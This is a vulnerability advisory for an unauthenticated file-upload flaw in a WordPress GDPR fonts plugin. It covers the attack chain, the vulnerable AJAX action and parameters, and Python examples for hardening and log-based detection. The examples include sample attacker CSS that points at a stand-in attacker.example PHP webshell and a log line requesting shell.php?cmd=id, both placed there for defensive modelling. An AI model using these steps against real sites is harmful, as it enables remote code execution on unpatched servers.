Introduction
An unauthenticated arbitrary file upload vulnerability in a WordPress GDPR compliance plugin gives anonymous attackers a direct path to remote code execution on affected sites. The flaw, tracked as CVE-2026-3535, scores a critical 9.8 on the CVSS scale and currently has no available patch.
The DSGVO Google Web Fonts GDPR plugin was built to help WordPress site owners comply with European GDPR regulations by downloading and locally hosting Google Fonts, rather than loading them directly from Google's servers. While the plugin addresses a legitimate privacy concern in the WordPress ecosystem, its implementation introduced a severe security flaw that completely undermines the security posture of any site running it. The plugin is listed on the official WordPress plugin repository.
Technical Information
Root Cause: Missing File Type Validation on a Public AJAX Endpoint
The vulnerability is classified under CWE-434 (Unrestricted Upload of File with Dangerous Type). The core issue resides in the DSGVOGWPdownloadGoogleFonts() function, which is responsible for fetching Google Font files and storing them locally on the WordPress server.
This function is registered via a wp_ajax_nopriv_ hook. In WordPress, the wp_ajax_nopriv_ prefix specifically designates an AJAX handler that accepts requests from unauthenticated users. The plugin developers did not implement any authentication checks, capability verifications, or nonce validation on this endpoint. As a result, any anonymous visitor on the internet can invoke this function by sending a crafted POST request to /wp-admin/admin-ajax.php.
The CVSS vector confirms the severity of this design flaw:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
This indicates network accessibility, low attack complexity, no privileges required, no user interaction needed, and high impact across confidentiality, integrity, and availability.
Attack Flow
The exploitation chain proceeds as follows:
- Attacker prepares a malicious CSS file. The attacker hosts a CSS file on a server they control. Instead of referencing legitimate font files, the CSS embeds URLs that point to malicious payloads such as PHP webshells.
- Attacker sends a POST request. The attacker issues an HTTP POST to the target WordPress site's /wp-admin/admin-ajax.php endpoint with the parameter action=DSGVOGWPdownloadGoogleFonts and a fonturl parameter pointing to the attacker-controlled CSS file.
- Plugin fetches the attacker's CSS. The DSGVOGWPdownloadGoogleFonts() function uses wp_remote_get() to retrieve the content at the supplied fonturl. It treats the response as CSS and parses it to extract URLs.
- Plugin downloads referenced files without validation. The function iterates over the extracted URLs and downloads each referenced file, writing it directly into the wp-content/dsgvo-google-web-fonts-gdpr/fonts/ directory. Critically, no file type validation occurs at any point in this process: the function checks neither file extensions, nor MIME types, nor file contents.
- Webshell lands in a publicly accessible directory. The downloaded PHP file now sits in a web-accessible path under wp-content/.
- Attacker executes arbitrary commands. The attacker requests the uploaded file's URL and achieves remote code execution on the underlying server.
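The chain above, modelled in Python as an added example. This is not the plugin's code and does not reconstruct its source: the url() regex, the sample CSS, and the host and extension allowlists are assumptions for illustration. vulnerable_plan() mirrors the write decision the advisory describes (every referenced file lands in fonts/ under its own basename, unchecked), and hardened_plan() applies the checks whose absence is the CWE-434 root cause.

```python
import re
from posixpath import basename
from urllib.parse import urlparse

# Constructed sample input: a CSS file as an attacker would host it. Two url()
# values point at real-looking font binaries; the third points at a PHP payload.
ATTACKER_CSS = """
@font-face {
  font-family: 'Roboto';
  src: url(https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Me5Q.woff2) format('woff2'),
       url(https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Me5Q.woff) format('woff');
}
@font-face {
  font-family: 'Evil';
  src: url(http://attacker.example/payload/shell.php) format('woff');
}
"""

# Matches url(...) with or without quotes. The plugin's own extraction logic is
# not known to this example; this regex is an assumption.
URL_RE = re.compile(r"url\(\s*['\"]?([^'\")\s]+)['\"]?\s*\)")

# Assumed policy for the hardened version: only Google's font hosts over HTTPS,
# only the extensions the plugin legitimately stores, and only plain filenames
# with exactly one dot (so "shell.php.woff" is rejected as well as "shell.php").
ALLOWED_HOSTS = {"fonts.gstatic.com", "fonts.googleapis.com"}
ALLOWED_EXTENSIONS = {".woff", ".woff2", ".ttf", ".eot"}
SAFE_NAME_RE = re.compile(r"[A-Za-z0-9_-]+\.[A-Za-z0-9]+")


def extract_urls(css: str) -> list[str]:
    return URL_RE.findall(css)


def vulnerable_plan(css: str) -> list[str]:
    """Behaviour the advisory describes: every url() is fetched and written to
    fonts/ under its own basename, with no host, extension or content check."""
    return [basename(urlparse(u).path) for u in extract_urls(css)]


def hardened_plan(css: str) -> list[str]:
    """Same extraction, but a reference is written only if it passes every check."""
    kept = []
    for u in extract_urls(css):
        p = urlparse(u)
        if p.scheme != "https" or p.hostname not in ALLOWED_HOSTS:
            continue  # attacker-hosted payloads are dropped here
        name = basename(p.path)
        if not SAFE_NAME_RE.fullmatch(name):
            continue  # traversal characters, empty names, double extensions
        ext = name[name.rfind("."):].lower()
        if ext not in ALLOWED_EXTENSIONS:
            continue
        kept.append(name)
    return kept


if __name__ == "__main__":
    print("vulnerable would write:", vulnerable_plan(ATTACKER_CSS))
    print("hardened would write:  ", hardened_plan(ATTACKER_CSS))
```

Filtering references is only half of a fix. The endpoint must also stop being reachable anonymously: drop the wp_ajax_nopriv_ registration and verify a capability and a nonce inside the handler, otherwise anonymous visitors can still make the server fetch arbitrary URLs and overwrite the site's fonts. The single-dot rule matters because an extension allowlist that accepts shell.php.woff can still be executed on Apache configurations that map .php with AddHandler, since mod_mime treats every dot-separated segment of a filename as an extension.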
Theme Prerequisite
Successful exploitation requires the WordPress site to be actively using one of six specific themes:
| Theme | Notes |
|---|---|
| twentyfifteen | Default WordPress theme |
| twentysixteen | Default WordPress theme |
| twentyseventeen | Default WordPress theme |
| storefront | Popular WooCommerce theme |
| salient | Premium theme |
| shapely | Free theme |
The presence of any single theme from this list as the active theme satisfies the exploitation condition. Three of these are former WordPress default themes (bundled with core releases in the 4.1 to 4.7 era) that commonly remain installed on long-running sites, and Storefront is widely deployed on WooCommerce stores, which broadens the practical attack surface considerably.
Relevant Source Code Locations
The vulnerable function registration can be found at line 46 of the plugin source, and the vulnerable download logic begins at line 159.
Detection Methods
While no formal detection signatures (YARA, Sigma, Snort, or Suricata rules) have been published for CVE-2026-3535 at this time, the technical details from the CVE record and Wordfence advisory provide rich material for building effective detection strategies.
Web Server Access Log Analysis
The most direct detection approach is monitoring web server access logs for requests targeting the WordPress AJAX endpoint. Look for HTTP POST requests to /wp-admin/admin-ajax.php carrying action=DSGVOGWPdownloadGoogleFonts. Note that admin-ajax.php reads the action parameter from either the query string or the POST body, and a standard access log records only the former; catching body-only requests requires a WAF or audit log that captures request bodies. In normal operation, this AJAX action would only be triggered by an authenticated administrator through the plugin's settings page, so any such request from an unauthenticated session (one lacking WordPress authentication cookies such as wordpress_logged_in_*) is a strong indicator of exploitation. Pay close attention to the fonturl parameter value: legitimate use would reference fonts.googleapis.com URLs, while exploitation attempts will point to attacker-controlled domains hosting malicious CSS that embeds URLs to PHP payloads.
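The log analysis described above, as an added example that is not part of the original advisory. The log lines are constructed, in Apache combined format plus a trailing %{Cookie}i field (an assumed format; adapt LINE_RE to your own). The predicate it applies, vulnerable action plus missing login cookie or non-Google fonturl, is the same one a WAF rule on admin-ajax.php would encode; the example also flags a request for a .php file under the plugin's fonts/ directory, which is the final step of the attack chain.

```python
import re
from urllib.parse import parse_qs, urlparse, urlsplit

# Constructed sample log (none of these lines come from the advisory).
SAMPLE_LOG = r'''
203.0.113.7 - - [12/Mar/2026:10:01:22 +0000] "POST /wp-admin/admin-ajax.php?action=DSGVOGWPdownloadGoogleFonts&fonturl=http%3A%2F%2Fattacker.example%2Ffonts.css HTTP/1.1" 200 15 "-" "curl/8.4.0" "-"
198.51.100.4 - - [12/Mar/2026:10:05:02 +0000] "POST /wp-admin/admin-ajax.php?action=DSGVOGWPdownloadGoogleFonts&fonturl=https%3A%2F%2Ffonts.googleapis.com%2Fcss%3Ffamily%3DRoboto HTTP/1.1" 200 15 "https://shop.example/wp-admin/options-general.php" "Mozilla/5.0" "wordpress_logged_in_a1b2=admin%7C1773309000%7Cabc; wp-settings-1=x"
203.0.113.7 - - [12/Mar/2026:10:01:40 +0000] "GET /wp-content/dsgvo-google-web-fonts-gdpr/fonts/shell.php?cmd=id HTTP/1.1" 200 512 "-" "curl/8.4.0" "-"
192.0.2.9 - - [12/Mar/2026:10:07:11 +0000] "GET /wp-content/dsgvo-google-web-fonts-gdpr/fonts/KFOmCnqEu92Fr1Me5Q.woff2 HTTP/1.1" 200 12345 "https://shop.example/" "Mozilla/5.0" "-"
'''

# combined format + "%{Cookie}i" as the last quoted field (assumed layout)
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)

AJAX_PATH = "/wp-admin/admin-ajax.php"
VULN_ACTION = "DSGVOGWPdownloadGoogleFonts"
FONTS_DIR = "/wp-content/dsgvo-google-web-fonts-gdpr/fonts/"
LEGIT_FONT_HOSTS = {"fonts.googleapis.com", "fonts.gstatic.com"}


def classify(line: str):
    """Return a finding dict for a suspicious line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    path, query = parts.path, parse_qs(parts.query)
    logged_in = "wordpress_logged_in_" in m["cookie"]

    # 1. The vulnerable AJAX action. admin-ajax.php reads `action` from either the
    #    query string or the POST body; an access log only shows the former, so
    #    body-only requests need a WAF/audit log fed through this same predicate.
    if path == AJAX_PATH and query.get("action", [""])[0] == VULN_ACTION:
        fonturl = query.get("fonturl", [""])[0]   # parse_qs already URL-decodes
        host = urlparse(fonturl).hostname or ""
        if not logged_in:
            reason = "vuln-action-unauthenticated"
        elif host not in LEGIT_FONT_HOSTS:
            reason = "vuln-action-nongoogle-fonturl"
        else:
            reason = "vuln-action-authenticated"   # expected admin usage, keep for audit
        sev = "info" if reason == "vuln-action-authenticated" else "high"
        return {"ip": m["ip"], "ts": m["ts"], "severity": sev,
                "reason": reason, "fonturl": fonturl}

    # 2. Post-exploitation: a PHP file being requested from the fonts directory.
    if path.startswith(FONTS_DIR) and path.lower().endswith(".php"):
        return {"ip": m["ip"], "ts": m["ts"], "severity": "high",
                "reason": "php-under-fonts-dir", "fonturl": ""}
    return None


def scan(log_text: str) -> list[dict]:
    return [f for f in (classify(l) for l in log_text.strip().splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The cookie check is a presence test only; a forged wordpress_logged_in_* cookie would pass it, so treat the "authenticated" outcome as audit context rather than proof of legitimacy, and corroborate with the fonturl host and the referer.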
File Integrity Monitoring (FIM)
Since the vulnerability writes downloaded files directly into the wp-content/dsgvo-google-web-fonts-gdpr/ directory tree (with font files landing in the fonts/ subdirectory), file integrity monitoring is an essential detection layer. Under legitimate operation, this directory should only contain font files (.woff, .woff2, .ttf, .eot) and CSS files (.css). The presence of any .php file, or of any file with a non-font extension, in wp-content/dsgvo-google-web-fonts-gdpr/fonts/ is a strong indicator of compromise. Because the plugin preserves whatever filename the attacker's CSS references, a payload can also arrive with a legitimate-looking font extension, so content checks (font container magic bytes, embedded PHP open tags) are worth layering on top of the extension check. Unexpected creation or modification of files in this directory outside of administrative actions should trigger an alert.
WAF Based Detection
Web Application Firewalls can be configured to inspect POST requests to admin-ajax.php. A targeted rule should flag or block any request where the action parameter equals DSGVOGWPdownloadGoogleFonts and the request lacks valid WordPress administrative authentication. A complementary, lower-confidence rule can flag cases where the fonturl parameter contains a host other than fonts.googleapis.com, since the plugin's intended function is solely to download Google-hosted fonts.
Plugin Presence Detection
As a baseline, security teams should inventory WordPress installations for the presence of the dsgvo-google-web-fonts-gdpr plugin. The Wordfence advisory confirms there is no patch available, and the affected versions span all releases through 1.1. Detecting the plugin's active presence by checking the wp-content/plugins/dsgvo-google-web-fonts-gdpr/ directory or querying the WordPress options table for DSGVOGWP_use_google_web_fonts is a critical first step in scoping exposure.
Post Exploitation Indicators
If exploitation has already occurred, look for:
- Outbound HTTP requests originating from the WordPress server to unfamiliar domains, as the vulnerable function uses wp_remote_get() to fetch attacker-supplied URLs.
- Unexpected files in wp-content/dsgvo-google-web-fonts-gdpr/fonts/ that are not font files. Webshells placed through this vulnerability may retain the filename from the attacker's malicious CSS.
- Modified wp_options entries for DSGVOGWP_use_google_web_fonts, DSGVOGWP_use_google_web_fonts_status, or DSGVOGWP_stylesheet, as the vulnerable function calls update_option() on these keys upon successful download.
Note that the exploit only triggers on sites running the specific themes listed above, which can help scope detection efforts.
Affected Systems and Versions
The vulnerability affects all versions of the DSGVO Google Web Fonts GDPR plugin up to and including version 1.1. There is no patched version available.
Exploitation additionally requires the WordPress site to have one of the following themes actively enabled:
- twentyfifteen
- twentysixteen
- twentyseventeen
- storefront
- salient
- shapely
Sites running the vulnerable plugin version without one of these themes active are not exploitable through this specific vector, but should still remove the plugin given the lack of any available patch.
References
- CVE Record: CVE-2026-3535
- NVD: CVE-2026-3535
- Wordfence Threat Intel: CVE-2026-3535
- Wordfence Advisory: DSGVO Google Web Fonts GDPR <= 1.1 Unauthenticated Arbitrary File Upload
- Plugin Source (Tag 1.1): Line 46 (Hook Registration)
- Plugin Source (Tag 1.1): Line 159 (Vulnerable Function)
- Plugin Source (Trunk): Line 46
- Plugin Source (Trunk): Line 159
- Plugin Source (SVN Tag 1.1)